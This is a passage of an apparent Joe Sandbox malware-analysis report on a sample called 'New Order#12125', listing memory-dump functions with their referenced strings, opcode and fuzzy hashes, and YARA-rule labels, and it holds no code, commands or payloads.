                                                                        Function 01502FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @4Qw@4Qw$PATH
                                                                        • API String ID: 0-1814558670
                                                                        • Opcode ID: f43a46afdfaf47d8278612c82e79817d002de0d980be97fe74c68f2866f11438
                                                                        • Instruction ID: 53853035edd94f9dfba0b30db4c34b6c9eadc49e870ef41b97a71b773f2248de
                                                                        • Opcode Fuzzy Hash: f43a46afdfaf47d8278612c82e79817d002de0d980be97fe74c68f2866f11438
                                                                        • Instruction Fuzzy Hash: 3EF1AB71D10219AFDB66DFD9D881AAEBBF1FF88700F454429E911AF394E7309941CBA0
                                                                        Function 015CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction ID: 1f74996afeaa34a69cfb9053a01334c187b5d907c13f7fd770a7382a11ce4646
                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction Fuzzy Hash: 26C1BF3120434A9FEB25CE68C841B6ABFE5BFD4B18F044A2CF6968F290E774D545CB51
                                                                        Function 01500CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Failed to retrieve service checksum., xrefs: 0155EE56
                                                                        • ResIdCount less than 2., xrefs: 0155EEC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                        • API String ID: 0-863616075
                                                                        • Opcode ID: b0e4e3e60710690879e482917e90821237b7f21facf066ffa52a2792f5978ee6
                                                                        • Instruction ID: ce916ee517c77451f62aa101ea3b51818be4fa54571619867c613b946e129040
                                                                        • Opcode Fuzzy Hash: b0e4e3e60710690879e482917e90821237b7f21facf066ffa52a2792f5978ee6
                                                                        • Instruction Fuzzy Hash: A5E1F1B19087449FE365CF15C480BABBBE0FB88315F408A2EF5999B390DB709909CF56
                                                                        Function 0157E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: 0d3fc286ff48ccee65a084c4f80523c9aacba93c50fcf3a666154409ca290f1b
                                                                        • Instruction ID: 6d06df4abc809b4adbe0b5974508594c19fe1c9126c4633f23c0d4262a0f4d8a
                                                                        • Opcode Fuzzy Hash: 0d3fc286ff48ccee65a084c4f80523c9aacba93c50fcf3a666154409ca290f1b
                                                                        • Instruction Fuzzy Hash: 3D615A71E003199FDB25DFA89842BAEBBF5FB48700F1444AEE649EF291D731A900CB50
                                                                        Function 015A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$MUI
                                                                        • API String ID: 0-17815947
                                                                        • Opcode ID: 87223bd13577bd96b5f2a60fdce57b741ada72a06634e6b845afec6365fa546b
                                                                        • Instruction ID: 88e59254d9dce4b502828317ef2c560aaebcfadfbd82dd6f3970222ed7dc06df
                                                                        • Opcode Fuzzy Hash: 87223bd13577bd96b5f2a60fdce57b741ada72a06634e6b845afec6365fa546b
                                                                        • Instruction Fuzzy Hash: 16513871E4021EAFDB11DFE9CC90AEEBBB8FB48754F540529E611BB290D6709905CB60
                                                                        Function 015004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0150063D
                                                                        • kLsE, xrefs: 01500540
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                        • API String ID: 0-2547482624
                                                                        • Opcode ID: eca07eea04475990ed0e4732cca95ea5058850641c4b9fd6a154e28db6b268f0
                                                                        • Instruction ID: 9544b106b7a4de2913564f4d887f3e9354ea30f8fa41d3d3f203fe058c9651e4
                                                                        • Opcode Fuzzy Hash: eca07eea04475990ed0e4732cca95ea5058850641c4b9fd6a154e28db6b268f0
                                                                        • Instruction Fuzzy Hash: 3151BF715047428BD726EFA8C8407ABBBE5BF84344F10483EFAAA8B2C1E774D545CB91
                                                                        Function 0150A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0150A309
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0150A2FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        • Opcode ID: 269c942cea9361a70b088a8d62048eccb63e90b7697b1915e25e14d701e75ffd
                                                                        • Instruction ID: 5fb2a8d536fc275ac266b05a3f71e19d7d1b53fbae993ba2ab3c017b23e60480
                                                                        • Opcode Fuzzy Hash: 269c942cea9361a70b088a8d62048eccb63e90b7697b1915e25e14d701e75ffd
                                                                        • Instruction Fuzzy Hash: 2D41AC30A04746DBEB16CF99C840BAE7BB8FF95740F1484A9E910DF2A5E7B5D940CB90
                                                                        Function 0153A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Cleanup Group$Threadpool!
                                                                        • API String ID: 2994545307-4008356553
                                                                        • Opcode ID: 1e97c6c78308009df384a1966c3cb152daabcb05ce987d82716045b88208e0fe
                                                                        • Instruction ID: 7689621d5b2fa4797edfa5a702b10b8dee51c40f7cca8525e4fe01bb1a60a77e
                                                                        • Opcode Fuzzy Hash: 1e97c6c78308009df384a1966c3cb152daabcb05ce987d82716045b88208e0fe
                                                                        • Instruction Fuzzy Hash: C201D1B2644700AFD311DF24CD45B1677E8F7C4715F018979A699CF190E734D814DB46
                                                                        Function 0150C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MUI
                                                                        • API String ID: 0-1339004836
                                                                        • Opcode ID: b7169586b766f9673fa550ed956e9c36cf8dc46c5923d2a4dec7534a42292405
                                                                        • Instruction ID: e76ae5ad34209595a1040863d2272ab842bfd4fd94027bbfdd2dd2dd909a83e0
                                                                        • Opcode Fuzzy Hash: b7169586b766f9673fa550ed956e9c36cf8dc46c5923d2a4dec7534a42292405
                                                                        • Instruction Fuzzy Hash: A9824C75E002199FEB26CFE9C8807EDBBB1BF45310F1482A9E959AF391D7709981CB50
                                                                        Function 01552F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: P`?wRb?w
                                                                        • API String ID: 0-3112501033
                                                                        • Opcode ID: 42f3b236e6defdae532dbc319006b12c3d481aeb44d588958f65e1643cd392f7
                                                                        • Instruction ID: 460ba241cef18d9be6e028ec5f34a63df11023539ff8a1f92d970e5d01e9417b
                                                                        • Opcode Fuzzy Hash: 42f3b236e6defdae532dbc319006b12c3d481aeb44d588958f65e1643cd392f7
                                                                        • Instruction Fuzzy Hash: 6B42D471D0425AAEEFE9CBACD4646BDBFB1BF04394F14801BED49AF291D6348A81C750
                                                                        Function 015ACD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                        • Instruction ID: 1f0e5f73b7fc9aa6e53840ff397225a1562c9ed9f90d4939eb32adfa6e2dfea3
                                                                        • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                        • Instruction Fuzzy Hash: B0621870D012188FCB98DF9AC4D4AADB7B2FF8C311F648199E9816BB45C7356A16CF60
                                                                        Function 01522E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0
                                                                        • API String ID: 0-4108050209
                                                                        • Opcode ID: 34afff36c5640784fc762cc4922ceec961cbeea1b324c023b56936a4bb164ee7
                                                                        • Instruction ID: 728996f7655fccaf0e4a98fd49ad303dede6043dc93d231b72820de0eef0f242
                                                                        • Opcode Fuzzy Hash: 34afff36c5640784fc762cc4922ceec961cbeea1b324c023b56936a4bb164ee7
                                                                        • Instruction Fuzzy Hash: 0CF1A076608356CFD765CF28C080A6EBBE1BFCE610F14486DE9998F281DB38D945CB52
                                                                        Function 0158EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: __aullrem
                                                                        • String ID:
                                                                        • API String ID: 3758378126-0
                                                                        • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                        • Instruction ID: bfe8b1888abcbbced26d370760f7016d17ca3ba5a17ef528d21902c19dcec6a0
                                                                        • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                        • Instruction Fuzzy Hash: EB416271F0011A9FDF18EEB9C8805BEF7F2FF88314B18867AD616EB284D67499518790
                                                                        Function 01500100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 1ef0a52434ec9bae91444c461ccfa6b2c315336967f7d2a808e4414bdcef47d3
                                                                        • Instruction ID: d893f796d22822495679fb1418c800bcdbb639a04222e7f4123a48b27c8faa79
                                                                        • Opcode Fuzzy Hash: 1ef0a52434ec9bae91444c461ccfa6b2c315336967f7d2a808e4414bdcef47d3
                                                                        • Instruction Fuzzy Hash: 1BA17E31A0425A67DF77CAA4CC51BFEABE5BF94394F04449AFE466F2C1C6B0DA408B50
                                                                        Function 015B4420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: d6655866390b886a3072fe6130a210e5933eb1328105fa043d0d665bb0556a2d
                                                                        • Instruction ID: 5015ec81e774e0a6a6710b62b7fd4db993575ff681944a30ece4de1a1fa3331f
                                                                        • Opcode Fuzzy Hash: d6655866390b886a3072fe6130a210e5933eb1328105fa043d0d665bb0556a2d
                                                                        • Instruction Fuzzy Hash: 90A116306003696ADF358E69CCC0BFE2BA4BF96754F080499AE879F2C3CB74C945CA50
                                                                        Function 01586420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 64a2dd29485083537a64cdd91c1c015e9ffad06b57049e623ae88e5aaf3d9235
                                                                        • Instruction ID: 6b000ed296c829add92f6e17ec5df6a7f61dc24f97eff8a8f57caeb8ad9537b1
                                                                        • Opcode Fuzzy Hash: 64a2dd29485083537a64cdd91c1c015e9ffad06b57049e623ae88e5aaf3d9235
                                                                        • Instruction Fuzzy Hash: 38915272A4021AAFEB21EB95CD85FAE7BB8FF59B54F140055F600BF190D774A904CBA0
                                                                        Function 015AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: ae2cc0065da7a8de04a003a50649d6dcab6c3fa09053c22ab168fe3804509215
                                                                        • Instruction ID: 356ae2eca3718a380d0ee0a38c71bf3cfc37f556cc49cfae3101a7d0f1468249
                                                                        • Opcode Fuzzy Hash: ae2cc0065da7a8de04a003a50649d6dcab6c3fa09053c22ab168fe3804509215
                                                                        • Instruction Fuzzy Hash: B191AE3294060AAFDB22ABA4DC55FAFBBB9FF85740F500029F500AB250E734A901CB90
                                                                        Function 0153A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalTags
                                                                        • API String ID: 0-1106856819
                                                                        • Opcode ID: 52e4dfb39a215e9a2945355f772f16a5f45b89704334f3531911cfc04cd73331
                                                                        • Instruction ID: 56153b9d72bd59b56d426e41eeb6c2983361e57236feb905c883e02642f0c33e
                                                                        • Opcode Fuzzy Hash: 52e4dfb39a215e9a2945355f772f16a5f45b89704334f3531911cfc04cd73331
                                                                        • Instruction Fuzzy Hash: 9B718DB5E0061A8FEF28CF9DE4916ADBBF1BF88740F14812EE805AF241E7318901CB50
                                                                        Function 015A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .mui
                                                                        • API String ID: 0-1199573805
                                                                        • Opcode ID: 168efb6ba0f444886afbab60205406ea0dded330524f5a097a84981e2bfc2ac7
                                                                        • Instruction ID: 67da233cb486afb682c74374838127d171f2cfe1ea44e1b4ac6b9b24cddb0904
                                                                        • Opcode Fuzzy Hash: 168efb6ba0f444886afbab60205406ea0dded330524f5a097a84981e2bfc2ac7
                                                                        • Instruction Fuzzy Hash: 8F51A272D4022A9FDF11DFD9D850AAEBBB5BF44A10F49412AEA11BF250D7B49C01CBE4
                                                                        Function 0151E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EXT-
                                                                        • API String ID: 0-1948896318
                                                                        • Opcode ID: cb80d93da237801652d938303b1e8aadf8d0e10ef270b3710e4e2eafb03657c7
                                                                        • Instruction ID: 86530b0a2c4c65c66bdf48c617a3eea59e1c0e3391476027f6d9812edf9faef1
                                                                        • Opcode Fuzzy Hash: cb80d93da237801652d938303b1e8aadf8d0e10ef270b3710e4e2eafb03657c7
                                                                        • Instruction Fuzzy Hash: 75416E725083529BF713EA65C841B6FBBE8FF88A14F44092EFA84DF184E674D9048792
                                                                        Function 0157C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: 1d44c802c89a4c9b34e962218a3a8274dda11d0c6d9e28f89081514996d8c343
                                                                        • Instruction ID: a5dc5e4df0d25791deac3c3024b09e7fa7f872594284bc531aba6082d091c32a
                                                                        • Opcode Fuzzy Hash: 1d44c802c89a4c9b34e962218a3a8274dda11d0c6d9e28f89081514996d8c343
                                                                        • Instruction Fuzzy Hash: 084113B1D0052EABDB21DA50DC85FDEB77CBB95718F0045A5AA08AF140DB709E898FA4
                                                                        Function 015807C3 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: :fcx
                                                                        • API String ID: 0-3800477985
                                                                        • Opcode ID: 4a9e31dacb61ad2c6c6362e6ab558b8d88139f861f12fc931a714f4fa934610e
                                                                        • Instruction ID: 03e2ad216b71efef22ff910bc99e5dd5e6c5fb6a741ff081709abcd32b7fc15b
                                                                        • Opcode Fuzzy Hash: 4a9e31dacb61ad2c6c6362e6ab558b8d88139f861f12fc931a714f4fa934610e
                                                                        • Instruction Fuzzy Hash: E34190715143019FD320EF29C845B9BBBE8FF88614F104A2EF598DB291D7709944CF92
                                                                        Function 01596B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #
                                                                        • API String ID: 0-1885708031
                                                                        • Opcode ID: 68810b4dc4f0e1ea6f96a2f949484ef7e25bd44ec28a331264a6076657d94623
                                                                        • Instruction ID: 16e8e95f48490144cd0c6b31b8e61f4a251f0280de3cc48e029c1fc7b91e8955
                                                                        • Opcode Fuzzy Hash: 68810b4dc4f0e1ea6f96a2f949484ef7e25bd44ec28a331264a6076657d94623
                                                                        • Instruction Fuzzy Hash: 7C312831A007999BEF22DF69C854FAE7BA8FF45704F144028F940AF282D775E809CB91
                                                                        Function 0157CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: 64971988b8a7a0b47ca1aae447655873ef03c06361bf24bf5554de60b8939c47
                                                                        • Instruction ID: c1bf96b9c488fb1d2e7cb54df9e1a94d32e806cbdb57c709ebfa81bce753bd53
                                                                        • Opcode Fuzzy Hash: 64971988b8a7a0b47ca1aae447655873ef03c06361bf24bf5554de60b8939c47
                                                                        • Instruction Fuzzy Hash: 4431013690051BAFEB16DA59E846E7FBBB4FF80720F114169B909AF250D7309E00DBE0
                                                                        Function 0158892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0158895E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                        • API String ID: 0-702105204
                                                                        • Opcode ID: 6a25ba4527d4fefe88c59d6bd02de9d70d9df672c58324c4c5aaafc111ff557c
                                                                        • Instruction ID: 148f00c44c113149270df4415683d46ff76b836538aacff5bcbcaf172a642f80
                                                                        • Opcode Fuzzy Hash: 6a25ba4527d4fefe88c59d6bd02de9d70d9df672c58324c4c5aaafc111ff557c
                                                                        • Instruction Fuzzy Hash: 6A0126363102029BE6317B5ACC84F6A7FA5FFC1254B84052DF7417E162CB20A844C792
                                                                        Function 0153E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a44c5be99113510459c2c31d76024390bc1ca428a07f4c51623b6b00110df349
                                                                        • Instruction ID: b408fc2469009f436e5818fb4824112e089c863babb613ce8044d9f74a655add
                                                                        • Opcode Fuzzy Hash: a44c5be99113510459c2c31d76024390bc1ca428a07f4c51623b6b00110df349
                                                                        • Instruction Fuzzy Hash: 00823372F102188BCF58CFADD8916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                        Function 0154516C Relevance: .8, Instructions: 785COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c7a76cac1120e2f7e4df42150ca5c8d0491213807f6a7fd1e78ef562f368164e
                                                                        • Instruction ID: 3ae7b08be9c0c94b25a66a14ddd57f93ebc8838dcb59882ad6ed90557155442e
                                                                        • Opcode Fuzzy Hash: c7a76cac1120e2f7e4df42150ca5c8d0491213807f6a7fd1e78ef562f368164e
                                                                        • Instruction Fuzzy Hash: 9D62B33691864AAFCF25CF08D4904AEFB62BE5531CB49C55DC89B2F605E371BA48CBD0
                                                                        Function 015A2000 Relevance: .8, Instructions: 757COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1cf393907bc91d117bf34016575d32faad59c663c504ca9e5707a485d188598
                                                                        • Instruction ID: f7b25c7801cafd3af231b568fc7a6cfbc0e2c3ea9f1414375f87491fc7ae285e
                                                                        • Opcode Fuzzy Hash: c1cf393907bc91d117bf34016575d32faad59c663c504ca9e5707a485d188598
                                                                        • Instruction Fuzzy Hash: 7542B5356483429FD725CF68C891A6FBBE5BFC8300F88492DFA869B250D770D945CB52
                                                                        Function 0155739A Relevance: .7, Instructions: 705COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a6e9181c885281dd08fa1062c62e8297ba81832ccf00fc445dee9b152a823cc
                                                                        • Instruction ID: b069f51c6057e821510f6e0a18e54319a3b14d5d0aaf69bf4f964b40983444fd
                                                                        • Opcode Fuzzy Hash: 2a6e9181c885281dd08fa1062c62e8297ba81832ccf00fc445dee9b152a823cc
                                                                        • Instruction Fuzzy Hash: 6642BF71A006168FDB59CF59C4A0AAEBBF2FF8C314B54855ED952AF340D730E942CBA0
                                                                        Function 0152B2C0 Relevance: .6, Instructions: 629COMMON
